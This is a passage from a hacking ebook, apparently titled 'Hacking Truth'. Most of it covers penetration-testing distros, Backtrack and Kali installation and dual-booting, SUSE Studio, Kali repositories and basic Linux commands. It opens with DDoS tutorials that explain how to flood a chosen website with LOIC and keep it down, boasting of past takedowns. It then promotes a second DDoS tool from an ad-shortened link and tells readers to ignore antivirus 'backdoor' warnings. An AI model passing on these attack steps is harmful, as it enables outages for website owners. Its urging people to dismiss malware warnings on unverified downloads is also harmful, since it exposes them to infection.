Now Your PC Will Send A Huge Traffic To That Site:D
Check That Site after 1 Hours it will be Down..!!!
Try This From More PC For A Good Response..!!!
DDOS ATTACK BY LOIC:-

For this tutorial we will be using one of the most effective and one of the least
known tools called "Low Orbit Ion Cannon", this tool created by Anonymous
members from 4chan.org, this program is one of the best for DDoS'ing, and I have
successfully used it to DDoS websites.
An internet connection as bad as mine (2,500 kb/s) was able to keep a site
down for a day with this program running. Remember that this tool will work best
with high internet speeds, and try not to go for impossible targets (like Google,
Myspace,Yahoo). LOIC is used on a single computer, but with friends it's enough to
give sites a great deal of downtime.

Download LOIC (Low Orbit Ion Cannon) :
www.sourceforge.net/projects/loic
71
H
a
c
k
i
n
g

T
r
u
t
h

Type the target URL in the URL box.
Click lock on.
Change the threads to 9001 for maximum efficiency.
Click the big button " IMMA FIRIN MAH LAZAR!"
Feel free to tweak around with these settings and play around with the program
to get the best performance. Then minimize and go do whatever you need to do, the
program will take care of the rest!
DDOS ATTACK BY J ANIDOS:-














Download From Here :
http://adfoc.us/10187334395229
After Downloading Open The Toolkit And Click On Try Weak Edition
this Ddos tool coded on visual basic 6 firstly you must send this ocx's to system32
comdlg32.ocx
msinet.ocx
mscomctl.ocx
mswinsck.ocx
This Tool will be detected supicious by Antiviruses because ddos tool
works on port 80 & it is also a backdoor port soo it is a false positive
detection dont worry this tool is clean.











72
H
a
c
k
i
n
g

T
r
u
t
h

BEGINNING WITH PENETRATION TESTING PLATFORMS

As of now many of you might been knowing what are these
penetration testing platforms. But, for those who dont know heres simple
introduction to this
What does it mean by penetration testing?
Penetration testing basically means finding the loopholes in your
system and removing it, so that your system becomes more secure. In
other words Penetration Tests, in short Pentest; are performed by an
individual to gather information about the vulnerabilities of his system.
Usually pentesters are software engineers; web developers or what
you call it as Hackers. They perform pentest on your request or by their
means but the aim is only finding the loopholes in the system.
Commonly pentest are performed in the following sequence:

Determining the feasibility of a particular set of attack vectors
Identifying higher-risk vulnerabilities that result from a combination of
lower-risk vulnerabilities exploited in a particular sequence
Identifying vulnerabilities that may be difficult or impossible to detect
with automated network or application vulnerability scanning software
Assessing the magnitude of potential business and operational
impacts of successful attacks
Testing the ability of network defenders to successfully detect and
respond to the attacks
Providing evidence to support increased investments in security
personnel and technology



73
H
a
c
k
i
n
g

T
r
u
t
h

What are penetesting distros?
Pentest distros are nothing else but the Linux based OSs which have
been included packages which are essential for Pentest work !
Out of Backtrack and Kali (also known as Backtrack 6) are very
famous and good pentesting distros !
Others are:
Blackbox
Security track
Black Ubuntu
Indishell OS
Even you can make your own Linux distro (given here
afterwords)

Okay now lets start with common pentest distros
Here Im giving following OSs installation guides:
1. Backtrack Linux
2. Kali Linux
3. Create your own!
Each of the OS can be installed in various forms like live USB, live CD
or DVD, Dual boot in HDD, Complete HDD installed, Installing in
VMware(whats that ? discussed later)






74
H
a
c
k
i
n
g

T
r
u
t
h

BACKTRACK LINUX

If you have not seen this dragon earlier then you are most welcome
this session is for you and you will enjoy it more! Who knows it better please
move to next session!
What is Backtrack?
BackTrack was a distribution based on the Debian GNU/Linux
distribution aimed at digital forensics and penetration testing use.[4] It was
named after backtracking, a search algorithm.
-wikipedia
Get this distribution here: http://www.backtrack-linux.org/

Lets start with installation!
1. Entire Hard Disk Install
2. Dual boot with Windows
3. Live USB install (google this one)
4. Live DVD install (google this one)



75
H
a
c
k
i
n
g

T
r
u
t
h


Here we go about the first installation method that is Full Hard Disk install
NOTE: Please note that installing Backtrack on entire HDD (Hard Disk
Drive) will remove your entire data, partitions and your previous OS if any
installed. Also, please note that beginners should take care about the
procedure they are about to follow! Its only to remove your previous install
if any, then continue with Backtrack.It is recommended that you have a minimum
of 20 GB free disk space to install Backtrack!
1. Boot the Backtrack Live Environment. (Wondered how to do this?) most of the
people do wonder how to boot into any OS please refer here! There are two
ways to do this either you can use your USB drive and also use DVD.
a. USB
i. To make your USB bootable you will need to extract the downloaded
iso into it using software Unetbootin.(download from
http://unetbootin.sourceforge.com)
ii. And restart to boot into USB,
iii. Press Delete when your desktop loads IDE drives (give attention to
the log which appears during reboot) or see at the bottom of the
screen of your desktop where it shows to enter BIOS setup
iv. In BIOS setup, change install directory from HDD to USB FDD
b. DVD
i. To make your DVD bootable, burn DVD with your downloaded ISO
as usual u do it.
ii. And restart to boot into DVD,
iii. Press Delete when your desktop loads IDE drives (give attention to
the log which appears during reboot) or see at the bottom of the
screen of your desktop where it shows to enter BIOS setup
iv. In BIOS setup, change install directory from HDD to CD DVD ROM
c. Then save it by pressing F12 and restart.
d. It will automatically boot into backtrack.
2. At the bash prompt, type startx to enter the GUI.
3. Double click the Install Backtrack.sh on the desktop
4. Let's run through the installer step by step:
5. We select our language, in this case English and then click the Forward button.

76
H
a
c
k
i
n
g

T
r
u
t
h

6.


7. Here we select out geographical location (The Region and Time Zone) and
click Forward.

8.

9.
77
H
a
c
k
i
n
g

T
r
u
t
h

10. Chose your keyboard layout. We are going to leave it the default which is
USA and click Forward.

11.
12. Now its time to partition the Disk, for a full Disk installation we choose the
Erase and use the entire disk option and click Forward.

13.


78
H
a
c
k
i
n
g

T
r
u
t
h


14. WARNING: Sometimes the installer will get stuck at difference
percentages, leave it for a while as it will move on.Hit the Restart Now button,
and enjoy Backtrack!

15.
16. After the reboot, you can log in with the default username root and
password toor. Do not forget to change this default root password by issuing
the passwd command to terminal.
17. As you can see the splash screen disappeared after the reboot. In order
to fix it just run fix-splash, and the splash screen will appear on the next boot.














79
H
a
c
k
i
n
g

T
r
u
t
h

Dual boot with windows 7
Note: Before you start make sure you have made about 20 30 GB space free. To
achieve this you can also do it manually from create and format disk partition in control
panel of windows or you can also use the easy US partition manager, which is given
in the giveaways here in the book at last!
Also, I will suggest you to backup your windows installation by create a system
recovery disk option in windows.
1. Boot the Backtrack Live Environment. (Wondered how to do this?) most of the
people do wonder how to boot into any OS please refer here! There are two
ways to do this either you can use your USB drive and also use DVD.
a. USB
i. To make your USB bootable you will need to extract the downloaded
iso into it using software Unetbootin.(download from
http://unetbootin.sourceforge.com)
ii. And restart to boot into USB,
iii. Press Delete when your desktop loads IDE drives (give attention to
the log which appears during reboot) or see at the bottom of the
screen of your desktop where it shows to enter BIOS setup
iv. In BIOS setup, change install directory from HDD to USB FDD
b. DVD
i. To make your DVD bootable, burn DVD with your downloaded ISO
as usual u do it.
ii. And restart to boot into DVD,
iii. Press Delete when your desktop loads IDE drives (give attention to
the log which appears during reboot) or see at the bottom of the
screen of your desktop where it shows to enter BIOS setup
iv. In BIOS setup, change install directory from HDD to CD DVD ROM
c. Then save it by pressing F12 and restart.
d. It will automatically boot into backtrack.
2. At the bash prompt, type startx to enter the GUI.
3. Double click the Install Backtrack.sh on the desktop
4. Let's run through the installer step by step:
5. We select our language, in this case English and then click the Forward button.

80
H
a
c
k
i
n
g

T
r
u
t
h

6.


7. Here we select out geographical location (The Region and Time Zone) and
click Forward.

8.

9.
81
H
a
c
k
i
n
g

T
r
u
t
h

10. Choose your keyboard layout. We are going to leave it the default which
is USA and click forward.

11.












82
H
a
c
k
i
n
g

T
r
u
t
h

12. Now its time to partition the Disk, for a quick and successful dual-boot
install we will choose the Install them side by side, choosing between them each
startup option and hit Forward..



WARNING: The installer might stop at certain percentages, leave it for a few minutes
and it will resume.
13. Hit the Restart Now button, and enjoy Backtrack!



14. When the computer will boot, you will be given a choice to boot Backtrack
or Windows.
83
H
a
c
k
i
n
g

T
r
u
t
h

15. After the reboot, you can log in with the default username root and
password toor. Do not forget to change this default root password by issuing
the passwdcommand.
16. As you can see the splash screen disappeared after the reboot. In order
to fix it just run fix-splash, and the splash screen will appear on the next boot.
Live persistent USB for this install please refer to http://www.backtrack-
linux.org/wiki/index.php/Persistent_USB however this install may make Backtrack to
run slower.




















84
H
a
c
k
i
n
g

T
r
u
t
h

KALI LINUX


Kali its now a days is shiningly called as Successor of Backtrack!

However its bit different from backtrack i.e. its a Debian based system whereas
Backtrack is Ubuntu based.

Download kali ISO from http://www.kali.org/

Here we go with installaions



85
H
a
c
k
i
n
g

T
r
u
t
h

Hard Disk install
(bored of typing on the same since making full HDD install isnt complexing since you
are ready to format the whole system so copied this one from kali docs)

KALI LINUX INSTALLATION REQUIREMENTS
Installing Kali Linux on your computer is an easy process. First, youll need compatible computer hardware. Kali
is supported on i386, amd64, and ARM (both armel and armhf) platforms. The hardware requirements are minimal
as listed below, although better hardware will naturally provide better performance. The i386 images have a
default PAE kernel, so you can run them on systems with over 4GB of RAM. Download Kali Linux and either burn
the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium. If you do not have a DVD
drive or USB port on your computer, check out the Kali Linux Network Install.
INSTALLATION PREREQUISITES
A minimum of 8 GB disk space for the Kali Linux install.
For i386 and amd64 architectures, a minimum of 512MB RAM.
CD-DVD Drive / USB boot support
PREPARING FOR THE INSTALLATION
1. Download Kali linux.
2. Burn The Kali Linux ISO to DVD or Image Kali Linux Live to USB.
3. Ensure that your computer is set to boot from CD / USB in your BIOS.






86
H
a
c
k
i
n
g

T
r
u
t
h

KALI LINUX INSTALLATION PROCEDURE

Note: Before you start make sure you have made about 20 30 GB space free. To
achieve this you can also do it manually from create and format disk partition in control
panel of windows or you can also use the easy US partition manager, which is given
in the giveaways here in the book at last!
Also, I will suggest you to backup your windows installation by create a system
recovery disk option in windows.
1. Boot the Kali Linux Environment. (Wondered how to do this?) most of the people
do wonder how to boot into any OS please refer here! There are two ways to
do this either you can use your USB drive and also use DVD.
1. USB
1. To make your USB bootable you will need to extract the downloaded
iso into it using software Unetbootin.(download from
http://unetbootin.sourceforge.com)
2. And restart to boot into USB,
3. Press Delete when your desktop loads IDE drives (give attention to
the log which appears during reboot) or see at the bottom of the
screen of your desktop where it shows to enter BIOS setup
4. In BIOS setup, change install directory from HDD to USB FDD
2. DVD
1. To make your DVD bootable, burn DVD with your downloaded ISO
as usual u do it.
2. And restart to boot into DVD,
3. Press Delete when your desktop loads IDE drives (give attention to
the log which appears during reboot) or see at the bottom of the
screen of your desktop where it shows to enter BIOS setup
4. In BIOS setup, change install directory from HDD to CD DVD ROM
3. Then save it by pressing F12 and restart.
4. It will automatically boot into Kali.
2. To start your installation, boot with your chosen installation medium. You should be greeted with the Kali Boot
screen. Choose either Gr aphi cal or Text -Mode install. In this example, we chose a GUI install.
87
H
a
c
k
i
n
g

T
r
u
t
h



3. Select your preferred language and then your country location. Youll also be prompted to configure your
keyboard with the appropriate keymap.


88
H
a
c
k
i
n
g

T
r
u
t
h

4. The installer will copy the image to your hard disk, probe your network interfaces, and then prompt you to enter a
hostname for your system. In the exam ple below, weve entered kali as our hostname.


5. 4.Enter a robust password for the root account.

89
H
a
c
k
i
n
g

T
r
u
t
h

6. Next, set your time zone.


7. The installer will now probe your disks and offer you four choices. In our example, were using the entire disk on
our computer and not configuring LVM (logical volume manager). Experienced users can use the Manual
partitioning method for more granular configuration options.



90
H
a
c
k
i
n
g

T
r
u
t
h

8. Next, youll have one last chance to review your disk configuration before the installer makes irreversible
changes. After you click Cont i nue, the installer will go to work and youll have an almost finished installation.


9. Configure network mirrors. Kali uses a central repository to distribute applications. Youll need to enter any
appropriate proxy information as needed.
NOTE! If you select NO in this screen, you will NOT be able to install packages from Kali repositories.

91
H
a
c
k
i
n
g

T
r
u
t
h

10. Next, install GRUB.


11. Finally, click Continue to reboot into your new Kali installation.


POST INSTALLATION
Now that youve completed installing Kali Linux, its time to customize your system. The Kali General Use section
of our site has more information and you can also find tips on how to get the most out of Kali in our User Forums.


92
H
a
c
k
i
n
g

T
r
u
t
h

DUAL BOOT KALI LINUX WITH WINDOWS 7


1. Shrink the Windows 7 C Drive: My test system has an existing installation of
Windows 7 on a 500 GB HDD, with just two primary partitions. This is how they
appear in Windows 7s partition manager. The task here is to shrink the C drive to
create room for installing Kali Linux. To do that, right-click on the C drive and select
Shrink Volume.
Note: If you intend to install Windows 7 afresh, this process will be a lot easier
if you set aside the free space that will be used for Kali Linux during the
installation of Windows 7.

If you have enough free space on the C drive, the system will suggest a 50-50 split
of the free space. Which is just good enough for this test installation. Shrink.
After the operation has completed, you should see the newly reclaimed space

93
H
a
c
k
i
n
g

T
r
u
t
h

next to the C drive. You may exit the partition manager and reboot the computer. Be
sure to have the installation disc of Kali Linux in the optical drive before rebooting.

2. Install Kali Linux: The best option to select on Kali Linuxs boot menu
is Graphical Install. It gives you a point-and-click installation process. Install works
just as well, but the interface is ncurses-based.
1. Boot the Kali Linux Environment. (Wondered how to do this?) most of the
people do wonder how to boot into any OS please refer here! There are two
ways to do this either you can use your USB drive and also use DVD.
a. USB
i. To make your USB bootable you will need to extract the downloaded
iso into it using software Unetbootin.(download from
http://unetbootin.sourceforge.com)
ii. And restart to boot into USB,
iii. Press Delete when your desktop loads IDE drives (give attention to
the log which appears during reboot) or see at the bottom of the
screen of your desktop where it shows to enter BIOS setup
iv. In BIOS setup, change install directory from HDD to USB FDD
b. DVD
i. To make your DVD bootable, burn DVD with your downloaded ISO
as usual u do it.
ii. And restart to boot into DVD,
iii. Press Delete when your desktop loads IDE drives (give attention to
the log which appears during reboot) or see at the bottom of the
screen of your desktop where it shows to enter BIOS setup
iv. In BIOS setup, change install directory from HDD to CD DVD ROM
c. Then save it by pressing F12 and restart.
d. It will automatically boot into Kali.
94
H
a
c
k
i
n
g

T
r
u
t
h



For installing Kali Linux, the following partitions will be created: /boot, /, /home, and
Swap. In that order. The /home partition is optional. At the disk partitioning methods
step of the installation process, you get a bunch of options. Because none of the
guided options will create a separate /boot partition, creating the partitions will have
to be done manually. So select Manual and click Continue.

Here you can see the existing Windows 7 partitions, both of which are primary
partitions. The free space, reclaimed from Windows 7 in the previous step is what
will be used for creating the partitions for Kali Linux. To start creating the partitions,
95
H
a
c
k
i
n
g

T
r
u
t
h

select the free space and click Continue.

Create a new partition. Continue.

This shows the total amount of disk space available for Kali Linux. The /boot
partition will be created first, so you need to specify the amount of disk space for it.

96
H
a
c
k
i
n
g

T
r
u
t
h

For this test system, I assigned 300 MB to it. Continue.

Because you still have two primary partitions to use, you can create the boot
partition as a primary or logical partition. Either option will work, but the installer
prefers creating it as a primary partition, if the boot loader is going to be installed in
it. For this test installation, I chose to create it as a logical partition. Continue.

Beginning. Continue.

This step shows the details of the boot partition you just created. The only thing you
need to change here is the mount point. Double-clicking on it will open another
window where you can specify the correct mount point.

97
H
a
c
k
i
n
g

T
r
u
t
h

Heres what it should look like after the mount point has been specified. The other
option you might want to change here is the Bootable flag.

There is a good reason it should be enabled, but the system will boot even if it is
disabled. It just depends on your BIOS version. For this test installation, it was
disabled and the system still worked perfectly.








Heres the final details of the boot partition. Scroll to Done setting up the partition,
then click Continue. Note that the steps you used to create the boot partition will be
98
H
a
c
k
i
n
g

T
r
u
t
h

repeated for the other partitions.

Back to the main disk partitioning window, you can see the boot partition you just
created, plus the remaining free space. Select, the free space, then click Continue.



The next partition will be mounted at /. A new installation of Kali Linux takes up
about 6.4 GB of disk space, so any amount greater than that will do. For the test
installation, I gave it 60 GB, which is way too much, so you do not have to do the
99
H
a
c
k
i
n
g

T
r
u
t
h

same. About 10-12 GB is more than enough. Continue.

Here are the details of the new partition. Scroll to Done setting up the partition,
then click Continue.

For the home partition, I gave it a disk space of 100 GB. Continue.

100
H
a
c
k
i
n
g

T
r
u
t
h

Here are the details of the new partition. Scroll to Done setting up the partition,
then click Continue.

For Swap, 2 GB is good enough. Continue.

101
H
a
c
k
i
n
g

T
r
u
t
h

Here are the default details of the new partition. To specify that it be used as a Swap
partition, double-click the Use as line.

Then select swap area. Continue.

102
H
a
c
k
i
n
g

T
r
u
t
h

Scroll to Done setting up the partition, then click Continue.

With all the partitions created, scroll to Finish partitioning and write changes to
disk. Continue. Make note of the device number of the boot partition. Here, it
is sda5. Youll need it later.

103
H
a
c
k
i
n
g

T
r
u
t
h

Select Yes. Continue.

By default, the installer will want to install GRUB, the boot loader, in the
Master Boot Record (MBR). However, for setting up this dual-boot system, we want
GRUB in the boot partition. So, select No. Continue.

This is where you have to specify where GRUB should be installed. For this test
system, it is /dev/sda5. Continue.

After installation, the computer will reboot into Windows 7. The next task involves
add an entry for Kali Linux in Windows 7s boot menu.
2. Add Kali Linux to Windows 7s boot menu: The simplest graphical
application for modifying the Boot Configuration Data of Window that I know,
104
H
a
c
k
i
n
g

T
r
u
t
h

is EasyBCD. It is free for personal use. You may download it from here. Install
it as you would any other Windows application. The main window is shown
below. To add an entry for Kali Linux in the boot menu, click on the Add New
Entry tab.


Then click on the Linux/BSD tab. From the Type dropdown menu, select GRUB 2.
Modify the name field to reflect the name of the distribution you are adding. From
the Drive menu, you can either select the specific partition corresponding to the boot
partition of the Kali Linux installation or let EasyBCD automatically locate and load it.
Either one will work. Note that EasyBCDs drive numbers and the device numbers of
the Linux partitions do not match. For example, in this test installation, the boot
partition is /dev/sda5, but the corresponding drive number in EasyBCD is Partition 3.
The size of the partition helps to determine which one it is. Click the Add
105
H
a
c
k
i
n
g

T
r
u
t
h

Entry button when wll the options have been specified.

From the Edit Boot Menu tab, you can see a preview of the entries that will appear
in the Windows 7 boot menu. Exit EasyBCD and reboot the computer. That should
do it.

106
H
a
c
k
i
n
g

T
r
u
t
h

Extra: Here are all the partitions on the HDD as seen from the Windows 7 partition
manager.


















107
H
a
c
k
i
n
g

T
r
u
t
h

MAKE YOUR OWN LINUX BASED OS
Go to http://susestudio.com/ , it will help you in making your own Linux based
distribution.
Use SUSE Studio to Build a Linux OS From Scratch

Think you can make a better fast-booting, Chrome-focused OS than Google?
Want to craft a custom Linux system that boots from a USB stick? SUSE Studio gives
you 15 GB to do exactly that, and you do it all online.
SUSE Studio is what powered the fan-made "Chrome OS" we posted
yesterday, which, in that case, was a semi-stripped-down system loaded with the
developers' version of Chrome, Google webapp links, and OpenOffice. If speed and
cloud computing aren't your bag, you can create a fully functional system with Firefox,
3D graphics, and whatever apps you can find installed. Want your system to start up
with an AWN dock and Launchy keystroke launcher running? Not a problem.
Even if you don't know all that much about Linux, it's pretty easy to build a
system you can boot from a USB stick or live CD/DVD, run inside a virtual machine
program, or actually install itor, heck, even test it out in your web browser.
Here's a basic walkthrough of building a system with SUSE Studio. In this case,
we're looking to build a GNOME-based system that would boot fairly quick and use
Chrome for most of its functions, and use GNOME-Do as the primary application
launcher.
GET AN ACCOUNT, CHOOSE YOUR DESKTOP
108
H
a
c
k
i
n
g

T
r
u
t
h

First things first, you'll need to grab an invitation and account from SUSE Studio.
While it's invite-only at the moment, I received my invite only 10 minutes after
registering and filling out a quick survey that suggested it would boost my invite reply
time. Once your invite arrives, you can sign into SUSE Studio with your Google or
Yahoo account, or any OpenID provider.

Once you're signed in, head to your "Home" screen and click the "Create new
appliance" link in the upper-right. SUSE Studio calls each bootable system you create
an "appliance" throughout the process. You'll be asked to choose your "base
template," which includes the GNOME and KDE desktops, a J ust Enough OS
(jeOS) option, and server or command-line-only choices. Most folks will want to lean
toward GNOME or KDE setups, as they're the most familiar graphical environments.
If you're familiar with Linux enough to know how to build a login manager and desktop
from a command line system, though, go ahead and play aroundyou can't really
hurt anything.
CHOOSE YOUR SOFTWARE
This is the real meat and potatoes of creating a system. Click the "Software" tab
and check out the packages already going into your system.

Based on your selection of a GNOME desktop, and SUSE Studio assuming you
want the Linux basics needed to boot, a few packages and repositories are already
109
H
a
c
k
i
n
g

T
r
u
t
h

installed for you. They're based on a basic installation of OpenSUSE, but you could
wipe the slate clean and start over with another RPM-based repository, if you so
chose.

If you wanted to add Firefox to your system, simply search for it in the search
bar farther down the page. Results from the repositories you've chosen appear, and
you can click "Add+" to load them into your system, with dependencies and other
needed packages automatically included. What if you don't see something you know
runs on Linuxlike, say, Google Chrome? Find an RPM-formatted package, like
those I found at Ben Kevan's blog, or add in a repository URL that carries regular
updates. Generally, a good Google search for the name of your program and
"OpenSUSE" should yield fruit. Hit the "Upload and Manage RPMs" link near the top
of the Software page, and you'll be able to upload from your computer, or point to a
file on the web. What's really neat is, once you upload your RPM files, you'll have a
special repository created for you that can be loaded into any system you build with
SUSE Studio.
CHANGE THE LOOK AND FEEL
Once you're done tinkering with your apps, head over to the Configuration tab
to mess with your eye candy and determine how your system will boot up. Start at the
"General" sub-section, making sure to change the user name at bottom to something
other than "Tux" and change the password away from the standard "linux." You can
set how you want your system to find a network connection (anything other than the
manual or no-network options should be fine), and whether to enable a firewall.
110
H
a
c
k
i
n
g

T
r
u
t
h


The Personalize section only has two parameters, but who doesn't like to see
their own logos and backgrounds stamped on a system? Next over, make sure the
"Startup" section has you set to boot into a graphical login. Under "Desktop," you can
set the OS to automatically boot to a desktop for faster start-up times, and the
"Configuration" field lets those planning to install to a disk or USB drive, or run in a
virtual machine, fine-tune their memory and disk use settings. "Overlay files" and
"Scripts" can mostly be skipped, unless you've got documents you need to have in
your test system or already work at a high level of Linux knowledge.




Grab and boot your OS

The "Build" section is where you get the good stuff. Pick the format you'd like to
download, whether an ISO for creating a CD/DVD, a disk image for hard disk or USB
transfer, or a ready-made virtual machine file for VirtualBox or VMWare. Choose your
111
H
a
c
k
i
n
g

T
r
u
t
h

format, set a version number, and that build will always be available for downloading
or "cloning." Not quite sure what to do with the files you received? Here's SUSE
Studio's guide to using SUSE Studio appliancesthough we'd certainly welcome
more tips, especially on imaging USB drives with .RAW image files, in the comments.
Don't have the time or patience to burn a CD or install a new virtual machine?
SUSE Studio actually lets you run your custom-built appliances on their own
virtualization servers, for up to one hour, for free. Hit the "testdrive" link on one of your
builds, and wait for it to boot up.

I was fairly impressed with the performance of a virtual machine I created
entirely online, running on servers likely a world away and controlled entirely through
a browser.


112
H
a
c
k
i
n
g

T
r
u
t
h

THE FIRST THINGS YOU MUST DO AFTER FRESH KALI LINUX OR BACKTRACK
LINUX INSTALL
These are the things which need to be done in order to keep ourselves updated
and more secure.
FIRST AND MOST IMPORTANT IS TO EDIT SOME CONTENT OF A FILE WHICH GIVES (SERVES)
YOU UPDATE.
1. Edit Kali Linux 1.0 Repository
nano /etc/apt/sources.list

2. Add these lines
deb http://http.kali.org /kali main contrib non-free
deb http://http.kali.org /wheezy main contrib non-free
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali-dev main
contrib non-free
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali-dev
main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali main contrib
non-free
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali main/debian-
installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb [arch=i386,amd64,armel,armhf] http://security.kali.org/kali-security
kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
3. Save and exit.
4. Open terminal
apt-get update
apt-get install
113
H
a
c
k
i
n
g

T
r
u
t
h

apt-get install firmware-b43-lpphy-installer

5. Also, have habit of giving command of apt-get update on every startup.

Also to have your speakers working always do this;
apt-get install veromix

and some apps that you may want I miss my old apps
I have missed some stuff. Some of them from BT5R3, and others I just like to use.
So, I had to install them by myself:
- armitage;
- arp-scan;
- Browser add-ons: Elite Proxy Switcher; Firebug; Flash onoff; Greasemonkey with
Cookie injector (http://userscripts.org/scripts/show/119798); HackBar; No script;
Poster; Tamper data.
- filezilla;
- flashplugin-nonfree;
- gedit;
- gwrite;
- htop;
- mysql-workbench;
- sshpass;
- sqlitebrowser;
- zenmap.
---------------------------------
1) To install add-ons press Ctrl+Shift+A, click "Get Add ons" on the left, them search
for each one (Elite Proyx...);
114
H
a
c
k
i
n
g

T
r
u
t
h

2) To install Cookie Injector go to link http://userscripts.org/scripts/show/119798 and
click the button "Install" on #the top right corner;

3) To install the other stuff just copy this:
apt-get install -y armitage arp-scan filezilla flashplugin-nonfree gedit gwrite
htop mysql-workbench sshpass sqlitebrowser zenmap





















115
H
a
c
k
i
n
g

T
r
u
t
h

BASIC LINUX COMMANDS
Modes of Operation

The linux operating system used for the PARTICLE DAQ system can be used
either in a terminal mode where you type commands or in a Windows Explorer style
graphical user interface (GUI).

The Explorer-like GUI can be used for file manipulation functions (e.g., copying
a file to a floppy) or deleting or moving files on the disk. It cannot be used to run the
PARTICLE DAQ itself.

To begin using the Explorer-like GUI, double click on the icons on the Desktop.
For the most part, Explorer mode will be familiar from Windows or MAC OS, so with
a few exceptions, this information will not focus on this. Where something is much
more easily done from Explorer mode, it will be highlighted here.

To begin working in the terminal mode, you will need to open a terminal. This
can be accomplished by clicking on the terminal icon in the bottom icon bar, by using
the main menu (footprint icon in lower left of bottom icon bar) System Tools ->New
Terminal.

The Manual (terminal mode)

Man -This command brings up the online Unix manual. Use it on each of the
commands below.

For Example:
man pwd -You will see the manual for the pwd command.


116
H
a
c
k
i
n
g

T
r
u
t
h

Accessing files in Folders (Directories) in terminal mode
pwd - Shows what directory (folder) you are in.
In Linux, your home directory is /home/particle

Let's suppose you have several data files (data1, data2 ... etc.) in a directory called
muondata.
Then suppose the directory muondata is an entry in your main home directory,
/home/particle.
If you are in your home directory (where terminals start) and type pwd, you will see
/home/particle.
If you were in the muondata directory, pwd would give you /home/particle/muondata
instead
The last slash after a directory name is optional.
As you can see, each slash (/) indicates another sub-directory.

Cd -Changes directories.

Examples of relative movement among directories:
cd muondata-Moves down from your current directory into the muondata sub-
directory

cd -Moves up one directory (yes, include the two little dots)

You can also move directly into directories
cd /home/particle/muondata - Moves from ANY directory into the muondata sub-
directory of your home directory.

cd ~ -Takes you back to your home directory
117
H
a
c
k
i
n
g

T
r
u
t
h

(/home/particle)

Making or Removing a Directory (terminal mode)

mkdir dirName - Creates a directory with name dirName.

For Example:
mkdir temp - Creates the directory temp.

rmdir dirName - Removes a directory dirName.

For Example:
rmdir temp - Removes the directory temp.
Looking at or Finding your Files (terminal mode)
Ls - Lists files.
If you add -al after ls it will give more details for each file. Such as, size, permissions,
owners, dates etc.
ls al - You'll see a huge list of files that you can't see with the 'ls' command alone and
lots of details.
If you see such a long list of files that they scroll off the terminal screen, one way to
solve the problem is to use:

ls -al |more Shows one screen of file names at a time.

less data1 -Dumps the contents of the data1 file to your screen with a pause at each
line so you don't miss any contents as they scroll. You may move through the file
using page up, page down, home and end keys. When done with less you use the q
key to get back to the main terminal.
118
H
a
c
k
i
n
g

T
r
u
t
h


whereis data1 -Shows you the location of the data1 file.

Altering your Files

rm data1 - Deletes the file data1 in the current directory.

rm -i muon* - Removes all of your muon data files
(careful!! rm * will remove ALL your files)
The "-i" makes the computer prompt before removing each file. If you really want to
work without a net, omit the "-i".

cp data1 newdata/ - will copy the file data1 to the directory newdata (assuming it has
already been created)

mv data1 newdata/ - moves the file data1 to the folder newdata and deletes the old
one.

Using the Floppy Disk Drive in Linux
The simplest way to access the floppy drive under Linux is to use the Explorer-
like interface. However, there is a very important detail! To access the files on the
disk, you have to mount the floppy disk, which means that the operating system will
scan the disk so that it can recognize the files on it. Although your computer will be
perfectly happy to allow you to remove the disk by pushing the eject key on the laptop
floppy drive, this may result in unexpected actions unless you unmount the disk. For
example, your files may be only partly there or not there at all! (This is no different
then under Windows or DOS; its just that those operating systems hide that detail
from you a little better. This is why, for example, you must eject floppy disks from the
disk properties menu in Windows.)

119
H
a
c
k
i
n
g

T
r
u
t
h

In the Explorer interface, to mount the floppy, you just double click on the
desktop icon. This will bring up a window with the contents of the floppy, and you may
drag and drop files there, or take any other actions you would with normal files. (Note:
unlike in Windows and MacOS, when you drag a file from your home area to the
floppy, it moves the file instead of making a copy.)

To remove the disk, you must first right-click on the desktop icon, and select
Unmount volume or Eject (either does the same thing). When this is complete (and it
may take a long time since it may have to complete writing files to the floppy!), you
may push the eject button on the floppy to remove it.

Things are more complicated by possible in the terminal mode:

mount Mounts a drive to the operating system.
Linux does not 'see' the floppy drive until
you tell it to.

For Example:
mount /mnt/floppy - Allows you to use the floppy drive which has directory name
/mnt/floppy

cp aFile /mnt/floppy/ - Copies the file aFile to the floppy disk.

ls /mnt/qfloppy/-Allows you to see what files are on your floppy.

You may run into problems moving large files onto a 1.44MB floppy disk. One option
to fit larger files is to create a zip archive containing the file onto the floppy. For
Example:

120
H
a
c
k
i
n
g

T
r
u
t
h

zip /mnt/floppy/myFile.zip muon.myDataRun -Moves the file muon.myDataRun
into a zip file on the floppy named myFile.zip

After you are done and before you eject it (this is very, very important), you must
unmount the floppy.

umount /mnt/qfloppy-Allows you to remove the floppy disk

Make sure you wait for the command prompt to reappear (this might take a few
seconds) before ejecting the floppy.
If you eject the floppy before you unmount the floppy, it may corrupt the data on the
floppy and cause the system to be confused if you try to use the floppy again.
If you make a mistake like this, it's probably best to reboot. Sorry.

df- Shows the disk usage. This will tell you how much disk space you have left on
your hard drive as well as the floppy.

so more commands are as follows :
A
alias Create an alias
apropos Search Help manual pages (man -k)
apt-get Search for and install software packages (Debian/Ubuntu)
aptitude Search for and install software packages (Debian/Ubuntu)
aspell Spell Checker
awk Find and Replace text, database sort/validate/index
B
basename Strip directory and suffix from filenames
bash GNU Bourne-Again SHell
121
H
a
c
k
i
n
g

T
r
u
t
h

bc Arbitrary precision calculator language
bg Send to background
break Exit from a loop
builtin Run a shell builtin
bzip2 Compress or decompress named file(s)
C
cal Display a calendar
case Conditionally perform a command
cat Concatenate and print (display) the content of files
cd Change Directory
cfdisk Partition table manipulator for Linux
chgrp Change group ownership
chmod Change access permissions
chown Change file owner and group
chroot Run a command with a different root directory
chkconfig System services (runlevel)
cksum Print CRC checksum and byte counts
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
command Run a command - ignoring shell functions
continue Resume the next iteration of a loop
cp Copy one or more files to another location
cron Daemon to execute scheduled commands
crontab Schedule a command to run at a later time
csplit Split a file into context-determined pieces
122
H
a
c
k
i
n
g

T
r
u
t
h

cut Divide a file into several parts
D
